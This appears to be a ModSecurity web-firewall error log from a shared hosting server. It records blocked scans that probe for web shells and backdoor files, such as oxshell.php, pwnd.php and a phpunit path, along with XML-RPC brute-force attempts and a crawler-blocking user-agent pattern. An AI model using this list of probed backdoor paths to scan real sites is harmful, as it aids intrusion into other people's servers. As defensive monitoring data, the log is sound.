[Tue May 26 17:17:44.875379 2026] [security2:error] [pid 869189:tid 869369] [client 20.205.111.246:5010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWIYNB5TZSn88J_orr0igAAADE"]
[Tue May 26 17:17:44.925293 2026] [security2:error] [pid 869189:tid 869406] [client 91.230.225.129:31109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 129.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahWIYNB5TZSn88J_orr0iAAAAFY"]
[Tue May 26 17:17:45.526976 2026] [security2:error] [pid 869189:tid 869418] [client 185.92.25.58:53795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahWIYdB5TZSn88J_orr0lAAAAGI"]
[Tue May 26 17:17:45.587185 2026] [security2:error] [pid 869189:tid 869446] [client 20.205.111.246:2084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahWIYdB5TZSn88J_orr0mAAAAH4"]
[Tue May 26 17:17:46.134972 2026] [security2:error] [pid 869189:tid 869333] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIYdB5TZSn88J_orr0pwAAAA0"]
[Tue May 26 17:17:46.329611 2026] [security2:error] [pid 869189:tid 869358] [client 104.28.196.58:41560] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/ms-themes.php"] [unique_id "ahWIYtB5TZSn88J_orr0twAAACY"]
[Tue May 26 17:17:46.339072 2026] [security2:error] [pid 869189:tid 869335] [client 20.205.111.246:2607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahWIYtB5TZSn88J_orr0uAAAAA8"]
[Tue May 26 17:17:47.108748 2026] [security2:error] [pid 869189:tid 869439] [client 20.205.111.246:4430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/license.php"] [unique_id "ahWIY9B5TZSn88J_orr0ywAAAHc"]
[Tue May 26 17:17:47.644079 2026] [security2:error] [pid 869189:tid 869420] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIYdB5TZSn88J_orr0qgAAAGQ"]
[Tue May 26 17:17:47.652383 2026] [security2:error] [pid 869189:tid 869370] [client 104.28.196.58:61307] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/chosen.php"] [unique_id "ahWIY9B5TZSn88J_orr01gAAADI"]
[Tue May 26 17:17:47.797055 2026] [security2:error] [pid 869189:tid 869437] [client 20.205.111.246:9406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahWIY9B5TZSn88J_orr03AAAAHU"]
[Tue May 26 17:17:48.003093 2026] [security2:error] [pid 869189:tid 869373] [client 104.28.196.58:61308] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/file.php"] [unique_id "ahWIZNB5TZSn88J_orr05AAAADU"]
[Tue May 26 17:17:48.379992 2026] [security2:error] [pid 869189:tid 869412] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIY9B5TZSn88J_orr04wAAAFw"]
[Tue May 26 17:17:48.486329 2026] [security2:error] [pid 869189:tid 869425] [client 20.205.111.246:7550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/manager.php"] [unique_id "ahWIZNB5TZSn88J_orr06wAAAGk"]
[Tue May 26 17:17:48.959581 2026] [security2:error] [pid 869189:tid 869447] [client 91.230.225.132:48291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 132.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahWIZNB5TZSn88J_orr1AAAAAH8"]
[Tue May 26 17:17:49.139763 2026] [security2:error] [pid 869189:tid 869417] [client 20.205.111.246:10489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/media.php"] [unique_id "ahWIZdB5TZSn88J_orr1BQAAAGE"]
[Tue May 26 17:17:49.808221 2026] [security2:error] [pid 869189:tid 869433] [client 20.205.111.246:6365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/mar.php"] [unique_id "ahWIZdB5TZSn88J_orr1HgAAAHE"]
[Tue May 26 17:17:49.939447 2026] [security2:error] [pid 869189:tid 869332] [client 223.235.98.214:2902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIZdB5TZSn88J_orr1IgAAAAw"]
[Tue May 26 17:17:49.940249 2026] [security2:error] [pid 869189:tid 869332] [client 223.235.98.214:2902] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIZdB5TZSn88J_orr1IgAAAAw"]
[Tue May 26 17:17:50.260409 2026] [security2:error] [pid 869189:tid 869390] [client 45.151.139.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIZtB5TZSn88J_orr1LQAAAEY"], referer: https://anujtradingco.com
[Tue May 26 17:17:50.498659 2026] [security2:error] [pid 869189:tid 869415] [client 20.205.111.246:8876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/my1.php"] [unique_id "ahWIZtB5TZSn88J_orr1PQAAAF8"]
[Tue May 26 17:17:50.511774 2026] [security2:error] [pid 869189:tid 869320] [client 202.155.143.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIZtB5TZSn88J_orr1PAAAAAA"], referer: https://www.anujtradingco.com/
[Tue May 26 17:17:51.232409 2026] [security2:error] [pid 869189:tid 869339] [client 20.205.111.246:8843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/mm.php"] [unique_id "ahWIZ9B5TZSn88J_orr1SwAAABM"]
[Tue May 26 17:17:51.329797 2026] [security2:error] [pid 869189:tid 869420] [client 104.28.228.58:27299] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/flower.php"] [unique_id "ahWIZ9B5TZSn88J_orr1TgAAAGQ"]
[Tue May 26 17:17:51.653538 2026] [security2:error] [pid 869189:tid 869433] [client 104.28.228.58:27304] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/gifclass.php"] [unique_id "ahWIZ9B5TZSn88J_orr1WQAAAHE"]
[Tue May 26 17:17:51.715327 2026] [security2:error] [pid 869189:tid 869364] [client 185.92.25.53:38607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahWIZ9B5TZSn88J_orr1WAAAACw"]
[Tue May 26 17:17:51.942856 2026] [security2:error] [pid 869189:tid 869333] [client 20.205.111.246:13080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/network.php"] [unique_id "ahWIZ9B5TZSn88J_orr1YwAAAA0"]
[Tue May 26 17:17:52.044339 2026] [security2:error] [pid 869189:tid 869392] [client 202.155.143.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIZ9B5TZSn88J_orr1ZgAAAEg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080254&moderation-hash=4622da9de0ddb7b220dd9b9be9c826ab
[Tue May 26 17:17:52.134769 2026] [security2:error] [pid 869189:tid 869324] [client 91.230.225.133:49783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 133.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahWIaNB5TZSn88J_orr1agAAAAQ"]
[Tue May 26 17:17:52.299052 2026] [security2:error] [pid 869189:tid 869322] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIZ9B5TZSn88J_orr1YgAAAAI"]
[Tue May 26 17:17:52.558929 2026] [security2:error] [pid 869189:tid 869372] [client 185.192.71.179:21055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahWIaNB5TZSn88J_orr1eAAAADQ"]
[Tue May 26 17:17:52.689908 2026] [security2:error] [pid 869189:tid 869417] [client 20.205.111.246:5373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/new.php"] [unique_id "ahWIaNB5TZSn88J_orr1iQAAAGE"]
[Tue May 26 17:17:52.737851 2026] [security2:error] [pid 869189:tid 869369] [client 203.194.101.7:58306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIaNB5TZSn88J_orr1iwAAADE"]
[Tue May 26 17:17:52.737990 2026] [security2:error] [pid 869189:tid 869369] [client 203.194.101.7:58306] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIaNB5TZSn88J_orr1iwAAADE"]
[Tue May 26 17:17:52.885425 2026] [security2:error] [pid 869189:tid 869414] [client 185.92.25.49:20083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahWIaNB5TZSn88J_orr1jwAAAF4"]
[Tue May 26 17:17:52.955830 2026] [security2:error] [pid 869189:tid 869355] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIaNB5TZSn88J_orr1hQAAACM"]
[Tue May 26 17:17:52.982082 2026] [security2:error] [pid 869189:tid 869364] [client 104.28.196.58:58241] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/bless.php"] [unique_id "ahWIaNB5TZSn88J_orr1kwAAACw"]
[Tue May 26 17:17:53.326120 2026] [security2:error] [pid 869189:tid 869345] [client 104.28.196.58:58249] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "karuppuswamykovil.in"] [uri "/class-t.api.php"] [unique_id "ahWIadB5TZSn88J_orr1oQAAABk"]
[Tue May 26 17:17:53.399884 2026] [security2:error] [pid 869189:tid 869329] [client 20.205.111.246:11869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahWIadB5TZSn88J_orr1pAAAAAk"]
[Tue May 26 17:17:53.724504 2026] [security2:error] [pid 869189:tid 869385] [client 91.230.225.118:53037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahWIadB5TZSn88J_orr1sAAAAEE"]
[Tue May 26 17:17:54.149467 2026] [security2:error] [pid 869189:tid 869367] [client 20.205.111.246:10247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/0.php"] [unique_id "ahWIatB5TZSn88J_orr1tAAAAC8"]
[Tue May 26 17:17:54.600901 2026] [security2:error] [pid 869189:tid 869326] [client 185.92.25.58:54871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahWIatB5TZSn88J_orr1wwAAAAY"]
[Tue May 26 17:17:54.662342 2026] [security2:error] [pid 869189:tid 869423] [client 14.163.178.157:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIatB5TZSn88J_orr1vgAAAGc"]
[Tue May 26 17:17:54.866417 2026] [security2:error] [pid 869189:tid 869339] [client 20.205.111.246:8805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/oxshell.php"] [unique_id "ahWIatB5TZSn88J_orr1ygAAABM"]
[Tue May 26 17:17:55.244565 2026] [security2:error] [pid 869189:tid 869338] [client 51.68.111.218:14573] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "corporatecargosolutions.com"] [uri "/robots.txt"] [unique_id "ahWIa9B5TZSn88J_orr12QAAABI"]
[Tue May 26 17:17:55.244699 2026] [security2:error] [pid 869189:tid 869338] [client 51.68.111.218:14573] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "corporatecargosolutions.com"] [uri "/robots.txt"] [unique_id "ahWIa9B5TZSn88J_orr12QAAABI"]
[Tue May 26 17:17:55.326500 2026] [security2:error] [pid 869189:tid 869437] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIatB5TZSn88J_orr1zQAAAHU"]
[Tue May 26 17:17:55.566707 2026] [security2:error] [pid 869189:tid 869443] [client 20.205.111.246:8803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahWIa9B5TZSn88J_orr12wAAAHs"]
[Tue May 26 17:17:56.042529 2026] [security2:error] [pid 869189:tid 869442] [client 185.192.71.168:42979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahWIa9B5TZSn88J_orr18QAAAHo"]
[Tue May 26 17:17:56.279534 2026] [security2:error] [pid 869189:tid 869405] [client 20.205.111.246:5438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahWIbNB5TZSn88J_orr19AAAAFU"]
[Tue May 26 17:17:56.849874 2026] [security2:error] [pid 869189:tid 869434] [client 185.92.25.59:31121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/envato-css.php"] [unique_id "ahWIbNB5TZSn88J_orr1_wAAAHI"]
[Tue May 26 17:17:56.969417 2026] [security2:error] [pid 869189:tid 869402] [client 20.205.111.246:5421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahWIbNB5TZSn88J_orr2CAAAAFI"]
[Tue May 26 17:17:57.223781 2026] [security2:error] [pid 869189:tid 869391] [client 91.230.225.115:52273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/classwithtostring.php"] [unique_id "ahWIbdB5TZSn88J_orr2CQAAAEc"]
[Tue May 26 17:17:57.669834 2026] [security2:error] [pid 869189:tid 869412] [client 20.205.111.246:1477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/past.php"] [unique_id "ahWIbdB5TZSn88J_orr2HwAAAFw"]
[Tue May 26 17:17:57.730648 2026] [security2:error] [pid 869189:tid 869437] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIbdB5TZSn88J_orr2EgAAAHU"]
[Tue May 26 17:17:58.387163 2026] [security2:error] [pid 869189:tid 869365] [client 20.205.111.246:10756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/root.php"] [unique_id "ahWIbtB5TZSn88J_orr2OQAAAC0"]
[Tue May 26 17:17:59.038587 2026] [security2:error] [pid 869189:tid 869426] [client 91.230.225.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIbtB5TZSn88J_orr2MAAAAGo"]
[Tue May 26 17:17:59.090004 2026] [security2:error] [pid 869189:tid 869446] [client 20.205.111.246:6792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/r.php"] [unique_id "ahWIb9B5TZSn88J_orr2WQAAAH4"]
[Tue May 26 17:17:59.833488 2026] [security2:error] [pid 869189:tid 869415] [client 91.230.225.130:46483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/index/function.php"] [unique_id "ahWIb9B5TZSn88J_orr2dQAAAF8"]
[Tue May 26 17:17:59.835945 2026] [security2:error] [pid 869189:tid 869411] [client 20.205.111.246:12478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahWIb9B5TZSn88J_orr2eQAAAFs"]
